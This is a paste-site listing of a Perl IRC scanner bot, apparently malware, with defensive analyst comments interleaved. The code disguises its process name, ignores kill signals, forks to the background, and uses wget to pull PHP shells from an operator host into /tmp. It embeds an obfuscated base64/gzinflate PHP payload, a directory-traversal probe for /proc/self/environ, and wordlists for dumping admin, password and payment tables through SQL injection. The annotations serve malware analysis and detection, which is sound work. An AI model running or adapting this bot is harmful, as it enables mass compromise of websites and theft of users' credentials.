Scanner

From x, 3 Years ago, written in Plain Text, viewed 1'760 times.
  1. #!/usr/bin/perl
  2. #################################################
  3. #                  _,.-----.,_
  4. #               ,-~           ~-.
  5. #             ,^___   -TijN-   ___^.
  6. #           Y  ,--._    I    _.--.  Y
  7. #           | Y     ~-. | ,-~     Y |
  8. #           | |        }:{        | |
  9. #           j l       / | \       ! l
  10. #        .-~  (__,.--" .^. "--.,__)  ~-.
  11. #       (           / / | \ \           )
  12. #        \.____,   ~  \/"\/  ~   .____,/
  13. #         ^.____                 ____.^
  14. #            | |T ~\  !   !  /~ T| |
  15. #            | |l   _ _ _ _ _   !| |
  16. #            | l \/V V V V V V\/ j |
  17. #            l  \ \|_|_|_|_|_|/ /  !
  18. #             \  \[T T T T T TI/  /
  19. #              \  `^-^-^-^-^-^'  /
  20. #               \               /
  21. #                \.           ,/
  22. #                  "^-.___,-^"
  23. #################################################
  24. #    THE REAL FREAKZ BLEND, Ha45K GREETZ U..    #
  25. #    IF U DONT UNDERSTAND THIS, DONT USE IT!    #
  26. # --------------------------------------------- #
  27. #   SO STOP MAKEING LIL SCAN CHANS FOR ME!!!!   #
  28. #################################################
  29. use HTTP::Request;                              #
  30. use HTTP::Request::Common;                      #
  31. use HTTP::Request::Common qw(POST);             #
  32. use URI::Escape;                                #
  33. use LWP::Simple;                                #
  34. use LWP 5.64;                                   #
  35. use LWP::UserAgent;                             #
  36. use Socket;                                     #
  37. use IO::Socket;                                 #
  38. use IO::Socket::INET;                           #
  39. use IO::Select;                                 #
  40. use MIME::Base64;                               #
  41. use Digest::MD5 qw(md5_hex);                    #
  42. #################################################
  43.  
  44. #$exists = kill 0, `head -1 .scn.pid`;
  45. #unless ($exists) { exec `tail -1 .scn.pid` }
  46. #if($exists) { die "bot all ready running"; }
  47.  
  48. my $datetime = localtime;
  49.  
  50. my $fakeproc = ('\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x68\x74\x74\x70\x64',
       # Analyst note: hex-escaped decoy process names. Decoded, in order, they spell:
       #   /usr/sbin/httpd, /usr/local/apache/bin/httpd -start, /sbin/syslogd, [Deco],
       #   /sbin/klogd -c 1 -x -x, /usr/sbin/acpid, /usr/sbin/cron, [httpds],
       #   /usr/sbin/httpd, [bash]
       # The later `$0 = ...` overwrite indexes @fakeproc, while this statement declares
       # the scalar $fakeproc; confirm the effective process title dynamically.
       # Detection: a perl interpreter whose displayed command line claims one of these
       # names; compare /proc/<pid>/exe with the name shown by ps.
  51.                          '\x2f\x75\x73\x72\x2f\x6c\x6f\x63\x61\x6c\x2f\x61\x70\x61\x63\x68\x65\x2f\x62\x69\x6e\x2f\x68\x74\x74\x70\x64\x20\x2d\x73\x74\x61\x72\x74',
  52.                          '\x2f\x73\x62\x69\x6e\x2f\x73\x79\x73\x6c\x6f\x67\x64',
  53.                          '\x5b\x44\x65\x63\x6f\x5d',
  54.                          '\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x6f\x67\x64\x20\x2d\x63\x20\x31\x20\x2d\x78\x20\x2d\x78',
  55.                          '\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x61\x63\x70\x69\x64',
  56.                          '\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x63\x72\x6f\x6e',
  57.                          '\x5b\x68\x74\x74\x70\x64\x73\x5d',
  58.                          '\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x68\x74\x74\x70\x64',
  59.                          '\x5b\x62\x61\x73\x68\x5d');
  60.  
  61. my $verbindnaar = "$ARGV[0]" if $ARGV[0];
       # Analyst note: all runtime configuration arrives as positional arguments, so the
       # launching command line (shell history, audit/process-creation logs) reveals the
       # control infrastructure:
       #   ARGV[0] -> IRC server host (passed to connector() as the peer address)
       #   ARGV[1] -> IRC server port (passed to connector() as the peer port)
       #   ARGV[2] -> control channel; "#" is prepended
       #   ARGV[3] -> admin value; its use is outside this excerpt
       #   ARGV[4] -> base URL from which bt.php, sh.txt and zero are fetched
       #   ARGV[5] -> $blog; its use is outside this excerpt
  62. my $deurtje             = "$ARGV[1]" if $ARGV[1];
  63. my $channel             = "#".$ARGV[2] if $ARGV[2];
  64. my $admin               = "$ARGV[3]" if $ARGV[3];
  65. my $injurl              = "$ARGV[4]" if $ARGV[4];
  66. my $blog                = "$ARGV[5]" if $ARGV[5];
  67.  
  68. my $shchn       = "#sshow";
  69.  
  70. my $nob0dy    = "4,1CraZy8Creation9Zzz ";
  71. my $lfilogo   = "12(4@LFI12)";
  72. my $lfdlogo   = "12(4@LFD12)";
  73. my $rfilogo   = "12(4@RFI12)";
  74. my $rcelogo   = "12(4@RCE12)";
  75. my $e107logo  = "12(4@e10712)";
  76. my $xmllogo   = "12(4@XML12)";
  77. my $sqllogo   = "12(4@SQL12)";
  78. my $oscologo  = "12(4@OSCO12)";
  79. my $cpanlogo  = "12(4@Cpanel12)";
  80. my $zenlogo   = "12(4@ZEN12)";
  81. my $oplogo    = "12(4@OpenCart12)";
  82. my $admlogo   = "12(4@phpMyAdmin12)";
  83. my $ossqllogo = "12(4@OSCO-SQL12)";
  84. my $timlogo   = "12(4@TIMTHUMB12)";
  85. my $zerologo  = "12(4@zBoard12)";
  86.  
  87. my %cmds = (
        # Analyst note: trigger words the bot advertises in its !help output, one per
        # scan module. These literal strings appearing in IRC PRIVMSG traffic are a
        # usable network-detection signature for this bot family.
  88.   lficmd    => '!lfi',
  89.   lfdcmd    => '!lfd',
  90.   rficmd    => '!rfi',
  91.   rcecmd    => '!rce',
  92.   e107cmd   => '!e107',
  93.   xmlcmd    => '!xml',
  94.   sqlcmd    => '!sql',
  95.   oscocmd   => '!osco',
  96.   cpancmd   => '!cpan',
  97.   zencmd    => '@zen',
  98.   opcmd     => '!op',
  99.   admcmd    => '!adm',
  100.   timcmd    => '!tim',
  101.   zerocmd       => '!zboard'
  102. );
  103.  
  104. my $cmdlfi    = '!cmdlfi';
  105. my $cmde107   = '!cmde107';
  106. my $cmdxml    = '!cmdxml';
  107.  
  108. my $injector  = $injurl."/bt.php?";
  109. my $botshell  = $injurl."/sh.txt?";
        # Analyst note: both URLs are built from the operator-supplied base URL (ARGV[4]);
        # the trailing "?" leaves room for whatever is appended later (not shown here).
        # Web-server logs with request parameters pointing at an external .../bt.php? or
        # .../sh.txt? are a sign that this tool probed the site.
        # The $b0tcmd string that follows is PHP wrapped as
        # eval(gzinflate(base64_decode('...'))); that wrapper is a common signature for
        # obfuscated PHP and is worth matching in uploaded files and request bodies.
  110.  
  111. my $b0tcmd = "eval(gzinflate(base64_decode('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
+RloKU8YF6deKqDAaqINRMJZVUC6+etNR3exjkcIs190Yp1Pp89v7wp+W+mZSMlSFbWBh6ZUsfpjcICQJ0L2mAU5HNrgL6V6BmwiH/iqlNuE4cB08DtVt4SyTICyi+E0M0sGZnYqlfTPNthiw6mo+AlzwHDfQWyj0HwJj+NfPP/ix+zotjA0s5GnnD0JcfcHmk5v3HgCa0UnSuOxB3466+IgPgI9ZF4ufhcuX/NeVDooVHwWUUOHwHOrU3Cb+0RtgYr5wmngAnjKAJyYOtPV6ESpjyvKAwlrVGBXDlcBqsLsE0iiEqt8Vg7uUrUlUFvWx1k2t7HF2/fSiYqC9hpGRUo+Yh3I3ldG1m3ISVZ18CEVdW5rHB2AhQ4QZa1nZ0NN3tR2Q316ggYQmaeA0exVH94XPvFHTOCW6oLVYPjCI4J4j21p1YeT+R5ZdjzV4KopEv6SaSS9nHXP/VpvagK3vaxNxz2er1Wb9BryXhfg2LSQ04kRJXKoHeitubDR/WsLruLxu8Sqho9+0RBGFAXebcIq5CCHmy63tW4WNrJ1TqXl9EwgFU8eNFlqbnyEB25jCNuABHUVmGYTh4lCXATHl/KRrE3pxj0mg51nIkgkEjx0zk3+l87+BKQz7rT/qHM+pkj8IkWMyOIE8dtbaTo/6T7vtyBbar/deEgFn92F1YkThIGj5FMLsLdxduImRhvRt8STMAxSP+wcIJ2cd1CR4sgxg0zs7c5k7ufV78RM4RllX1Eyk9eijj0D6fxdZyggu9pzNT3NBHFrUDEIvcf5sh428lF5OmHBW1RHqKa+wX+E/lUHbD25TJdnQ3QPxkmCy4g6ENJA5IOdEEbQkS+Zp0TtsstslAEiZeJw6hcbbmOfRsp8AkOfqV6GNP7byoNYvGnT6Vm78lLUqn9JgXfVoLDIbRQAE6WFccrtyvLavRYfw8WPbCEvAANeyLLhJPUiPnces3ivyj6caeDlscvUoTPoX3vGDbQazkF8qZcLotvIwX1XtLHUBEGeBRHgIBRJnA0HTiaicR7ZPbBG7IIUuPGvAxyx2hmCDXcBdJfsBznv+BgIvia+Wy/c8NP5JLkpxOP0WTzt4rnh1U3nABfH8/QYjCQ0XFB4gCvyOP/TUSDT4IWKVyz8+glis3ZpnIgigYjC14165ZfpmxRR1AU7/8tXsJY/NmLFzhjxe3mFsdgWD/og4xgaky4qWFveWuR//J3DZFfVHohXb9cX+1eDJDztBfZuGzIDSXWs6uByjkX+vqndClSn54Ppd1AY5hUMj7rSo7VrvVmeZt6zBUArwhovAw8rxntjAIPyD8ESbhHuY4kVJaH92PkxwQFUD2LDEGTRXkOlWAYs2dVlsyu1fbp5benU41rc+e4cRUfX7P1Gv7wNLAGgH2tl0o2HL7QjIV1uRoEk67ZVcvsQ7fSO53YCJm93d1d387rMJ7WV2f/WAyJL4ZEyc9lB3ikaVaz932r2OwWm7cJ8/O+lq8WjZYo11SzeNUpttr3nWYZT5nIMVYD8zduUMcdkwAJdDDnSCpFuGbbw97cQ6QB7iDB8hmeoVhdqVeMzh5eEOEEKmOVJExYI19byiXdsB8A/XSCm9Ox5OyvSDKVOYrTJ2dyvYIzUkJNGE3n1iu9ABx5B0c+BIe4DceBg+MgBMfuNhz7Do79EBz9bTiyDo5sCA5uG460gyMdgmOwDQfj4GBCcExcOAKm9cTKf9wzqVzAbjSDt/gPSCgJlLCQpM1m/+3r6ANz3fyl67J4XSxg5sCiRDUwPiUABQ43wbXsnS0rj7J5+pXMMq9klj4IYTYbkdnsG5ils69jlk6/klkmhNm0xYS2hVkbru1mNhaL4f2XEid6oqGLIG9MfEXBZl6x3rbypeIh/o7PhJ4MhQdMIPM6ds9KC9bCyZw7XE0YcducIPGHQbr5mwK3RgpzgM1c5G/KdreSbO/yrtXb5ZOiv8kbRYG4Wjk7OTMThATn/v/dd+SC8dc6/wU=')));";
  112.  
  113. my @uagents   = ('Microsoft Internet Explorer/4.0b1 (Windows 95)','Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)','Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)',
  114.                                  'Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)','Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)','Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
  115.                                  'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)','Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)',
  116.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
  117.                                  'Mozilla/4.40 (compatible; MSI4E 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)',
  118.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)','Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)','Mozilla/4.0 (compatible; MSIE 7.0b; Win32)',
  119.                                  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)','Microsoft Pocket Internet Explorer/0.6','Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)',
  120.                                  'MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)',
  121.                                  'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
  122.                                  'Advanced Browser (http://www.avantbrowser.com)','Avant Browser (http://www.avantbrowser.com)','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
  123.                                  'Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)','Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)',
  124.                                  'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511','Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929',
  125.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0','Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox',
  126.                                  'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
  127.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6','Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6',
  128.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7','Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
  129.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4','Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4',
  130.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
  131.                                  'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1','Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1',
  132.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1','Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1',
  133.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2','Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0',
  134.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b','Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
  135.                                  'Mozilla/3.0 (OS/2; U)','Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)','Mozilla/4.61 (Macintosh; I; PPC)','Mozilla/4.61 [en] (OS/2; U)',
  136.                                  'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)','Mozilla/4.8 [en] (Windows NT 5.0; U)','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
  137.                                  'msnbot/1.1 (+http://search.msn.com/msnbot.htm)','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
  138.                                  'FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)','Gigabot/3.0 (http://www.gigablast.com/spider.html)','gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)',
  139.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12','IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)',
  140.                                  'Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4','Infoseek SideWinder/2.0B (Linux 2.4 i686)','Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6',
  141.                                  'Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)','Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1',
  142.                                  'Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)','Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)');
  143.                                  
  144. my $uagent    = $uagents[rand(scalar(@uagents))];
        # Analyst note: one User-Agent is picked at random from @uagents, once per run.
        # Many entries are very old browsers or crawler names (Googlebot, bingbot,
        # Baiduspider), so a crawler UA arriving from an address that does not belong to
        # that crawler is a useful log heuristic.
        # $lfdtest is a long "../" traversal ending in /proc/self/environ%0000; that
        # substring in a request path or parameter is a high-confidence probe indicator.
        # $open_test is an FCKeditor connector test page path, and $open_output is the
        # page title expected in the response. $adm_output is a marker string compared
        # elsewhere (not shown in this excerpt).
  145. my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
  146. my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  147. my $adm_output = ("0WN4GE");
  148. my $open_output = ("FCKeditor - Connectors Tests");
  149.  
  150. my @tabele              = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','name','names','nombre','nombres',
  151.                                         'usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator','passwd',
  152.                                         'administrators','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','mods',
  153.                                         'user_name','user_names','member_password','mod','moderators','moderator','user_email','user_emails','user_mail',
  154.                                         'user_mails','mail','emails','email','address','e-mail','emailaddress','correo','correos','phpbb_users','log',
  155.                                         'logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tpassword','tPassword',
  156.                                         'u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave',
  157.                                         'login_id','pwd','pas','sistema_id','sistema_usuario','sistema_password','contrasena','auth','key','senha',
  158.                                         'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
  159.                                         'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account',
  160.                                         'accnts','associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers',
  161.                                         'utilisateurs','password','amministratore','god','God','authors','asociado','asociados','autores','membername',
  162.                                         'autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','paypal','credit','bank','transaction',
  163.                                         'order','account','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  164. my @kolumny             = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  165.                                         'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  166.                                         'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
  167.                                         'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  168.                                         'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  169.                                         'paypal','credit','bank','transaction','order','account','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password',
  170.                                         'autor','upassword','web_password','web_username');
  171.  
  172. my %conf = (
        # Reporting toggles (1 = on, 0 = off); presumably they control what the bot
        # announces on IRC. Their consumers are outside this excerpt.
  173.   shchan => 1,          # Shell info is shown in $shchn
  174.   ssfind => 0,          # Show sites found by the search engines
  175.   ssdone => 0,          # Show when a scan is done
  176.   soscos => 1,          # Show osco sites that may be vulnerable
  177.   stindb => 0,          # Show TIMTHUMB results for debugging
  178.   oscupl => 0,          # Show osco file uploads
  179.   xmlvln => 0           # Show xml vulns (otherwise only finds that include system info)
  180. );
  181.  
  182. $SIG{'INT'}   = 'IGNORE';
        # Analyst note: the common termination signals are ignored, so Ctrl-C, a hangup
        # or a plain `kill <pid>` (SIGTERM) will not stop the process. SIGKILL cannot be
        # ignored, so incident responders should use `kill -9` after collecting evidence.
        # Ignoring CHLD means child processes are reaped automatically.
  183. $SIG{'HUP'}   = 'IGNORE';
  184. $SIG{'TERM'}  = 'IGNORE';
  185. $SIG{'CHLD'}  = 'IGNORE';
  186. $SIG{'PS'}    = 'IGNORE';
  187.  
  188. chdir("/tmp");
        # Analyst note: staging step. Working from /tmp, the backtick command below runs
        # in a shell: it deletes earlier pbot.*, sh.* and zero.* files, then uses wget to
        # fetch <injurl>/bt.php as pbot.jpg, <injurl>/sh.txt as sh.jpg and <injurl>/zero.
        # $injurl is interpolated unquoted into that shell string.
        # Host artefacts: /tmp/pbot.jpg, /tmp/sh.jpg, /tmp/zero, and wget running as a
        # child of perl. The .jpg names hold text/PHP content, so a file-type mismatch
        # check will flag them.
  189. chop (my $priper = `rm -rf pbot.* && wget $injurl/bt.php -O pbot.jpg && rm -rf pbot.jpg.* && rm -rf sh.* && wget $injurl/sh.txt -O sh.jpg && rm -rf sh.jpg.* && rm -rf zero.* && wget $injurl/zero && rm -rf zero.*`);
        # Process-name masquerading: $0 is overwritten with an element of @fakeproc
        # followed by 16 NUL bytes. Only the scalar $fakeproc is declared in the visible
        # source, so confirm the resulting title dynamically. /proc/<pid>/exe still
        # points at the perl binary regardless of what ps displays.
  190. my $faceproc = $fakeproc[rand(scalar(@fakeproc))];
  191. $0 = "$faceproc"."\0" x 16;
        # Backgrounding: fork, the parent exits at once and the child carries on, so the
        # launching shell returns while the bot keeps running under a new PID.
  192. my $pid = fork;
  193. #open($f1le, ">", ".scn.pid");
  194. #printf $f1le = $pid;
  195. #close $f1le;
  196. exit if $pid;
        # Reached with an undefined $pid only when fork itself failed.
  197. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  198.  
  199. our %irc_servers;
        # Package-level connection state. %irc_servers is keyed by socket and holds
        # host/port/nick/myip per connection (filled in by connector()). %DCC and
        # $dcc_sel are declared here; their use is outside this excerpt.
        # $sel_client is the IO::Select set that the main loop polls for readable
        # sockets.
  200. our %DCC;
  201. my $dcc_sel = new IO::Select->new();
  202. $sel_client = IO::Select->new();
  203. sub sendraw {
           # Write one raw IRC protocol line to a socket.
           #   sendraw($socket, $text) - two arguments: write to the given socket
           #   sendraw($text)          - otherwise: write to the global $IRC_cur_socket
           # Lines end with a bare "\n" (no "\r"). Everything the bot sends to its
           # control server goes through here, which makes it the natural place to
           # hook or log when running the sample in a sandbox.
  204.     if ($#_ == '1') {
  205.     my $socket = $_[0];
  206.     print $socket "$_[1]\n";
  207.     } else {
  208.         print $IRC_cur_socket "$_[0]\n";
  209.     }
  210. }
  211.  
  212. my @domen = ('biz','info','org','net','edu','gov','mil','ps','gr','off.ai','vu','kw','com.uy','aq','vg','lk','gw','eh','lv','sj','com.na','na','bv','com.ph','ph','ca','xn--p1ai','mp','td','be','kh','com.mx','mx','com.jm','jm','zr','com.ni','ni','com.gi','gi','th','co.th','co.ke','ke','va','it','to','kg','com.bo','bo','com.mt','tm','ge','co.ls','ls','mz','sc','ee','tc','com.bz','bz','cv','co.kr','co.cr','cr','am','yu','com.ar','ar','li','ne','re','co.il','il','com.pr','pr','com.et','et','co.id','id','iq','nc','co.in','sh','com.my','my','hr','bs','com.ec','ec','ba','ad','co.za','nl','cl','nz','co.nz','co.hu','hu','bg','is','co.uk','tf','er','gh','eu','uz','en','ie','co.im','la','fr','cd','co.ug','lc','tt','zw','com.bd','bd','ro','cf','io','an','pn','mh','ye','dm','sr','cn','bb','ru','mm','ms','hm','kn','tk','bt','fo','lr','pk','com.tj','com.ly','ly','com.sb','sb','tg','mt','si','lb','com.af','af','bj','jo','ax','pg','com.br','br','mr','ml','km','co.zm','ma','gb','kz','yt','mw','sd','mn','ky','bf','gm','kp','a1','lt','ch','lu','qa','ci','um','pa','com.pa','in','st','rw','ga','as','cx','co.ck','ck','sl','ht','co.ve','cz','com.pe','pe','md','bi','com.nf','nf','com.vn','me','tl','so','com.co','co','gn','gs','mo','fi','no','co.bw','bw','tv','bn','dz','co.vi','cm','com.om','om','com.do','do','pf','com.vc','nr','aw','sm','ao','mu','fm','gl','by','es','fk','gt','com.gt','co.je','hn','at','al','pw','mc','o1','ai','ua','ap','com.hk','hk','cy','com.pk','gp','eg','wf','kr','gf','com.au','pm','ae','us','com.np','np','cu','com.cu','fx','com.py','py','cs','gu','gd','pt','sz','tz','cg','sn','sy','pl','tr','com.sa','sa','ki','dj','ir','rs','com.sg','sg','ng','tn','mg','ws','com.tr','com.fj','fj','mq','sk','gq','mk','a2','nu','com.sv','sv','gy','mv','de','com.ag','ag','se','bh','com.tw','tw','cc','co.jp','jp','az');
